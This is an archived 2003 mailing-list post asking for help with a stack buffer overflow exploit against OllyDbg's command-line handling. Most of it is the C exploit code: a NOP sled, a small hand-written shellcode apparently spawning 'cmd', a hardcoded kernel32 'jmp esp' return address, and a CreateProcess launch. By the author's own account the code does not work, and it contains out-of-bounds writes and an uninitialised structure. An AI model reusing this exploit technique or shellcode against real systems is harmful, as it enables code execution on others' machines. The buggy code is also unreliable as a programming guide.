Hello all, Just messing around with win32 overflows, and i've run into a small problem with command line overflows. Ollydbg has a buffer overflow when you call a program with a large command line. (I found this when trying to debug rasphone.exe in WinXP (rasphone -f <1000'a>) I was expecting Ollydbg to run the program but it crashed itself "Error in Instruction 0x41414141 while trying to 'read' 0x41414141. So I tried to write an exploit for Ollydbg. Issue #2 Visual C++ crashes as well when i'm trying to debug ollydbg so I have to do this blindly. My exploit buffer looks like: ollydbg.exe ollydbg.exe <200 NOPS>Shellcode<more nops>[&EIP]<nops> I'm trying to use CreateProcess to call ollydbg.exe but it doesn't do anything, no crash no nothing. So i saved the exploit buffer to a file and tried to 'paste' it (heh). It doesn't crash even though there are over 600 characters... (Ollydbg.exe overwrites EIP at 508-511, i think i can't debug it!) Anyways here's my code any insite on why this isn't working is greatly appreciated: #include <windows.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char exp_buff[1024]; int x,i; char ollyfile[100]; DWORD jmpesp = 0x77E9AE59; // jmp esp call in kernel32.dll unsigned char shellcode[19] = "\xC7\x45\xFD\x63\x6D\x64\x20\x8D\x45\xFD\x50\xB8\x35\xFD\xE6\x77\xFF\xD0"; //tiny sc PROCESS_INFORMATION pi; STARTUPINFO si; if (argc != 2) { fprintf(stderr, "heh: %s <path to olly>\n", argv[0]); exit(1); } strncpy(ollyfile, argv[1], 99); ollyfile[100] = 0x00; x = strlen(ollyfile); memset(exp_buff, 0x90, 1024); memcpy(exp_buff, ollyfile, x); exp_buff[x] = ' '; memcpy(exp_buff+200, &shellcode, 19); exp_buff[218] = 0x90; for (i = 219; i <= 508; i++) { exp_buff[i] = 0x90; } exp_buff[1024] = 0x00; memcpy(exp_buff+508, &jmpesp, 4); fprintf(stderr, "%s", exp_buff); //debugging heh CreateProcess("E:\\ollydbg\\ollydbg.exe", exp_buff, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); return(0); } Thanks -wire _____________________________ For the best comics, toys, movies, and more, please visit <http://www.tfaw.com/?qt=wmf>
This archive was generated by hypermail 2b30 : Thu Jun 05 2003 - 11:34:07 PDT